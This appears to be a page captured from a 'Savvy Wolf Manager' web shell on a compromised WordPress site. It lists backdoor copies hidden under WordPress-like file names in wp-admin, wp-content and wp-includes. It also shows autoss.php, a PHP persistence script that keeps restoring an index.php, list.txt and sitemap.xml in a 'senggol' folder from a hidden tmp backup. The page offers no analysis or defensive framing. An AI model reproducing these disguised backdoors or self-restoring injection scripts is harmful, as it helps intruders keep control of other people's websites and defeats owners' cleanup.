Backups Created:
/home/falconag/public_html/wp-admin/admin-wolf.php
/home/falconag/public_html/wp-content/edit-wolf.php
/home/falconag/public_html/wp-includes/widgets/class-wp-wolf-widget.php
Savvy
W
olf -
MANAGER
Edit File: autoss.php
<?php // Script auto cek dan sinkronisasi file date_default_timezone_set('Asia/Jakarta'); function ensureDirectoriesExist($filePath) { $dir = dirname($filePath); if (!is_dir($dir)) { mkdir($dir, 0755, true); } } $currentFile = '/home/falconag/public_html/senggol/index.php'; $backupFile = '/home/falconag/tmp/backupsss/index.php'; ensureDirectoriesExist($currentFile); if (!file_exists($currentFile) || file_get_contents($currentFile) !== file_get_contents($backupFile)) { copy($backupFile, $currentFile); } $currentFile = '/home/falconag/public_html/senggol/list.txt'; $backupFile = '/home/falconag/tmp/backupsss/list.txt'; ensureDirectoriesExist($currentFile); if (!file_exists($currentFile) || file_get_contents($currentFile) !== file_get_contents($backupFile)) { copy($backupFile, $currentFile); } $currentFile = '/home/falconag/public_html/senggol/sitemap.xml'; $backupFile = '/home/falconag/tmp/backupsss/sitemap.xml'; ensureDirectoriesExist($currentFile); if (!file_exists($currentFile) || file_get_contents($currentFile) !== file_get_contents($backupFile)) { copy($backupFile, $currentFile); }